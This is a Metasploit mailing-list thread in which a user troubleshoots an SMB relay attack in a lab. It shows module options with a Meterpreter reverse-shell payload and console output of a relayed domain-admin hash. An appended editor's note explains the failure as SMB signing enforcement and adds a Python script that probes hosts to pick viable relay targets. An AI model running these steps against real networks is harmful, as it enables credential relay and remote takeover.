Metasploit mailing list archives

Re: SMB_RELAY attacks still possible?


From: Kurt Grutzmacher <grutz () jingojango net>
Date: Fri, 24 Dec 2010 23:53:13 -0500

Hi Brian,

SMBRELAY attacks should still work depending upon your negotiated NTLM
settings and what is currently supported within Metasploit's library. Can
you confirm that metasploit to DC works via smb_login or psexec? If yes then
SMBRELAY really should work.

What version of Windows is your DC running?

--
 Kurt Grutzmacher -=- grutz () jingojango net


On Fri, Dec 24, 2010 at 3:25 PM, Epic <epicdonk () gmail com> wrote:

I should also note, that I have confirmed it is possible to go from
192.168.0.2->\\192.168.0.1\ADMIN$ manually using the currently logged in
credentials.


On Fri, Dec 24, 2010 at 1:22 PM, Brian S Traveling <epicdonk () gmail com> wrote:

Hi,

Is it possible to still carry out smb_relay attacks by specifying a
different SMBHOST?  It doesn't seem to be working for me...  I was
under the assumption it was still possible...

my test environment:
domain controller: 192.168.0.1 (also dhcp/router)
windows 7 workstation: 192.168.0.2 (clicking the UNC path - joined to
domain)
metasploit box: 192.168.0.35 (not joined to domain)


msf exploit(smb_relay) > show options

Module options:

  Name        Current Setting  Required  Description
  ----        ---------------  --------  -----------
  SMBHOST     192.168.0.1      no        The target SMB server (leave empty for originating system)
  SRVHOST     192.168.0.35     yes       The local host to listen on.
  SRVPORT     445              yes       The local port to listen on.
  SSL         false            no        Negotiate SSL for incoming connections
  SSLVersion  SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)


Payload options (windows/meterpreter/reverse_tcp):

  Name      Current Setting  Required  Description
  ----      ---------------  --------  -----------
  EXITFUNC  thread           yes       Exit technique: seh, thread, none, process
  LHOST     192.168.0.35     yes       The listen address
  LPORT     4444             yes       The listen port


Exploit target:

  Id  Name
  --  ----
  0   Automatic


msf exploit(smb_relay) > exploit
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.0.35:4444
[*] Server started.
msf exploit(smb_relay) > [*] Received 192.168.0.2:62573
MYDOMAIN\domainadmin
LMHASH:000000000000000000000000000000000000000000000000

NTHASH:91fw9w155441a411b1a40edf8d7adlf70101000000000000a2cwcbd785a2cb020f640031811663700000000020000000000000000000000
OS: LM:
[*] Authenticating to 192.168.0.1 as MYDOMAIN\domainadmin...
[*] AUTHENTICATED as MYDOMAIN\domainadmin...
[*] Connecting to the ADMIN$ share...
[*] Error processing request from 192.168.0.2:62573 (115): Rex::Proto::SMB::Exceptions::ErrorCode The server responded with error: STATUS_ACCESS_DENIED (Command=117 WordCount=0)
/opt/metasploit3/msf3/lib/rex/proto/smb/client.rb:176:in `smb_recv_parse'
/opt/metasploit3/msf3/lib/rex/proto/smb/client.rb:994:in `tree_connect'
/opt/metasploit3/msf3/lib/rex/proto/smb/simpleclient.rb:253:in `connect'
(eval):133:in `smb_haxor'
(eval):530:in `smb_cmd_session_setup'
(eval):332:in `smb_cmd_dispatch'
/opt/metasploit3/msf3/lib/msf/core/exploit/smb.rb:716:in `smb_recv'
/opt/metasploit3/msf3/lib/msf/core/exploit/smb.rb:647:in `on_client_data'
/opt/metasploit3/msf3/lib/msf/core/exploit/tcp.rb:386:in `start_service'
/opt/metasploit3/msf3/lib/rex/io/stream_server.rb:45:in `call'
/opt/metasploit3/msf3/lib/rex/io/stream_server.rb:45:in `on_client_data'
/opt/metasploit3/msf3/lib/rex/io/stream_server.rb:182:in `monitor_clients'
/opt/metasploit3/msf3/lib/rex/io/stream_server.rb:180:in `each'
/opt/metasploit3/msf3/lib/rex/io/stream_server.rb:180:in `monitor_clients'
/opt/metasploit3/msf3/lib/rex/io/stream_server.rb:69:in `start'
/opt/metasploit3/msf3/lib/rex/thread_factory.rb:21:in `call'
/opt/metasploit3/msf3/lib/rex/thread_factory.rb:21:in `spawn'
/opt/metasploit3/msf3/lib/msf/core/thread_manager.rb:64:in `call'
/opt/metasploit3/msf3/lib/msf/core/thread_manager.rb:64:in `spawn'
/opt/metasploit3/msf3/lib/msf/core/thread_manager.rb:57:in `initialize'
/opt/metasploit3/msf3/lib/msf/core/thread_manager.rb:57:in `new'
/opt/metasploit3/msf3/lib/msf/core/thread_manager.rb:57:in `spawn'
/opt/metasploit3/msf3/lib/rex/thread_factory.rb:21:in `spawn'
/opt/metasploit3/msf3/lib/rex/io/stream_server.rb:68:in `start'
/opt/metasploit3/msf3/lib/msf/core/exploit/tcp.rb:393:in `start_service'
/opt/metasploit3/msf3/lib/msf/core/exploit/tcp.rb:313:in `exploit'
/opt/metasploit3/msf3/lib/msf/core/exploit_driver.rb:201:in `job_run_proc'
/opt/metasploit3/msf3/lib/msf/core/exploit_driver.rb:148:in `run'
/opt/metasploit3/msf3/lib/rex/job_container.rb:36:in `call'
/opt/metasploit3/msf3/lib/rex/job_container.rb:36:in `start'
/opt/metasploit3/msf3/lib/rex/thread_factory.rb:21:in `call'
/opt/metasploit3/msf3/lib/rex/thread_factory.rb:21:in `spawn'
/opt/metasploit3/msf3/lib/msf/core/thread_manager.rb:64:in `call'
/opt/metasploit3/msf3/lib/msf/core/thread_manager.rb:64:in `spawn'
/opt/metasploit3/msf3/lib/msf/core/thread_manager.rb:57:in `initialize'
/opt/metasploit3/msf3/lib/msf/core/thread_manager.rb:57:in `new'
/opt/metasploit3/msf3/lib/msf/core/thread_manager.rb:57:in `spawn'
/opt/metasploit3/msf3/lib/rex/thread_factory.rb:21:in `spawn'
/opt/metasploit3/msf3/lib/rex/job_container.rb:31:in `start'
/opt/metasploit3/msf3/lib/rex/job_container.rb:155:in `start_bg_job'
/opt/metasploit3/msf3/lib/msf/core/exploit_driver.rb:145:in `run'
/opt/metasploit3/msf3/lib/msf/base/simple/exploit.rb:125:in `exploit_simple'
/opt/metasploit3/msf3/lib/msf/base/simple/exploit.rb:147:in `exploit_simple'
/opt/metasploit3/msf3/lib/msf/ui/console/command_dispatcher/exploit.rb:154:in `cmd_exploit'
/opt/metasploit3/msf3/lib/rex/ui/text/dispatcher_shell.rb:246:in `send'
/opt/metasploit3/msf3/lib/rex/ui/text/dispatcher_shell.rb:246:in `run_command'
/opt/metasploit3/msf3/lib/rex/ui/text/dispatcher_shell.rb:208:in `run_single'
/opt/metasploit3/msf3/lib/rex/ui/text/dispatcher_shell.rb:202:in `each'
/opt/metasploit3/msf3/lib/rex/ui/text/dispatcher_shell.rb:202:in `run_single'
/opt/metasploit3/msf3/lib/rex/ui/text/shell.rb:143:in `run'
/usr/local/bin/msfconsole:124/SMBRelay

Thanks!



_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework
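Editor's note on the run quoted above: the relay authenticated to 192.168.0.1 as MYDOMAIN\domainadmin and then failed at the very next step, the tree connect to ADMIN$, with STATUS_ACCESS_DENIED. That is the usual symptom when the target requires SMB signing: an unsigned relayed session gets through session setup, but every later unsigned command is refused. Domain controllers require signing by default, which is why a practitioner checks the target's negotiate response before relaying at all. Whether that is what happened in this thread is not established on the page. The script below is an added example, not code from the thread or from Metasploit; it builds a bare SMB1 SMB_COM_NEGOTIATE request, parses the NT LM 0.12 response and reports the SecurityMode signing bits (MS-CIFS 2.2.4.52.2: 0x04 signing enabled, 0x08 signing required). The sample responses it constructs for offline use are made up here; `probe()` is the only part that touches the network and is a plain socket exchange, not a Metasploit API.

```python
"""Check whether an SMB1 server advertises signing as enabled/required.
Added example for the thread above; not Metasploit code."""
import socket
import struct

SMB1_MAGIC = b"\xffSMB"
SMB_COM_NEGOTIATE = 0x72
NT_LM_012 = b"NT LM 0.12"

# SecurityMode bits of the NT LM 0.12 negotiate response (MS-CIFS 2.2.4.52.2)
NEGOTIATE_USER_SECURITY = 0x01
NEGOTIATE_ENCRYPT_PASSWORDS = 0x02
NEGOTIATE_SECURITY_SIGNATURES_ENABLED = 0x04
NEGOTIATE_SECURITY_SIGNATURES_REQUIRED = 0x08


def _smb1_header(command, status=0, flags=0x18, flags2=0xC843):
    """32-byte SMB1 header. flags2 0xC843 = UNICODE | NT_STATUS | EXTENDED_SECURITY
    | IS_LONG_NAME | EAS | LONG_NAMES; TID/PID/UID/MID are zero for a negotiate."""
    return (SMB1_MAGIC + bytes([command]) + struct.pack("<I", status)
            + bytes([flags]) + struct.pack("<H", flags2)
            + b"\x00" * 12                       # PIDHigh, SecurityFeatures(8), Reserved
            + struct.pack("<HHHH", 0, 0, 0, 0))  # TID, PIDLow, UID, MID


def _netbios(smb):
    """NetBIOS session message: type 0x00 followed by a 3-byte big-endian length."""
    return struct.pack(">I", len(smb)) + smb


def build_negotiate_request(dialects=(NT_LM_012,)):
    """SMB_COM_NEGOTIATE request offering only the listed SMB1 dialects."""
    data = b"".join(b"\x02" + d + b"\x00" for d in dialects)
    return _netbios(_smb1_header(SMB_COM_NEGOTIATE) + b"\x00"   # WordCount = 0
                    + struct.pack("<H", len(data)) + data)     # ByteCount, dialects


def build_negotiate_response(security_mode, dialect_index=0):
    """Constructed NT LM 0.12 negotiate response (sample data for offline use only)."""
    params = struct.pack("<HBHHIIIIqHB",
                         dialect_index, security_mode,
                         50, 1,                  # MaxMpxCount, MaxNumberVcs
                         16644, 65536,           # MaxBufferSize, MaxRawSize
                         0, 0x8000E3FD,          # SessionKey, Capabilities
                         0, 0, 0)                # SystemTime, ServerTimeZone, ChallengeLength
    return _netbios(_smb1_header(SMB_COM_NEGOTIATE, flags=0x98)  # 0x80 = reply
                    + bytes([17]) + params + struct.pack("<H", 0))


def parse_negotiate_response(packet):
    """Return the signing posture advertised in an NT LM 0.12 negotiate response."""
    if len(packet) < 4 + 32 + 1:
        raise ValueError("packet too short for an SMB1 header")
    nb_len = struct.unpack(">I", packet[:4])[0] & 0x00FFFFFF
    if packet[0] != 0x00:
        raise ValueError("not a NetBIOS session message")
    smb = packet[4:4 + nb_len]
    if smb[:4] != SMB1_MAGIC:
        raise ValueError("not SMB1 (an SMB2/3 server answers with \\xfeSMB)")
    command, status = smb[4], struct.unpack("<I", smb[5:9])[0]
    if command != SMB_COM_NEGOTIATE or status != 0:
        raise ValueError(f"unexpected command 0x{command:02x} / status 0x{status:08x}")
    word_count = smb[32]
    if word_count != 17:   # 17 words = the NT LM 0.12 parameter block
        raise ValueError(f"WordCount {word_count}: server did not select NT LM 0.12")
    dialect_index, security_mode = struct.unpack("<HB", smb[33:36])
    return {
        "dialect_index": dialect_index,
        "security_mode": security_mode,
        "signing_enabled": bool(security_mode & NEGOTIATE_SECURITY_SIGNATURES_ENABLED),
        "signing_required": bool(security_mode & NEGOTIATE_SECURITY_SIGNATURES_REQUIRED),
    }


def relay_can_proceed(info):
    """A signing-required server lets an unsigned relayed session authenticate and then
    refuses its later commands, so treat signing_required as a hard stop for plain relay."""
    return not info["signing_required"]


def probe(host, port=445, timeout=5.0):
    """Live check: send the negotiate and parse the reply. Servers with SMB1 disabled
    simply close the connection, which is reported instead of crashing."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(build_negotiate_request())
        hdr = s.recv(4)
        if len(hdr) < 4:
            raise ValueError("connection closed before a negotiate response (SMB1 disabled?)")
        nb_len = struct.unpack(">I", hdr)[0] & 0x00FFFFFF
        body = b""
        while len(body) < nb_len:
            chunk = s.recv(nb_len - len(body))
            if not chunk:
                break
            body += chunk
    return parse_negotiate_response(hdr + body)


if __name__ == "__main__":
    import sys
    for target in sys.argv[1:]:
        info = probe(target)
        print(f"{target}: SecurityMode=0x{info['security_mode']:02x} "
              f"signing_required={info['signing_required']} "
              f"relay_can_proceed={relay_can_proceed(info)}")
```

Run it as `python3 smbsign.py 192.168.0.1 192.168.0.2` against a lab. A workstation that answers with SecurityMode 0x07 (signing enabled, not required) is a viable relay target; a host that answers 0x0F (required) will produce exactly the pattern in the thread, authentication followed by STATUS_ACCESS_DENIED on the first real command. Kurt's smb_login/psexec test is complementary: it proves the credentials and path work when the client can sign, which a relay cannot.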

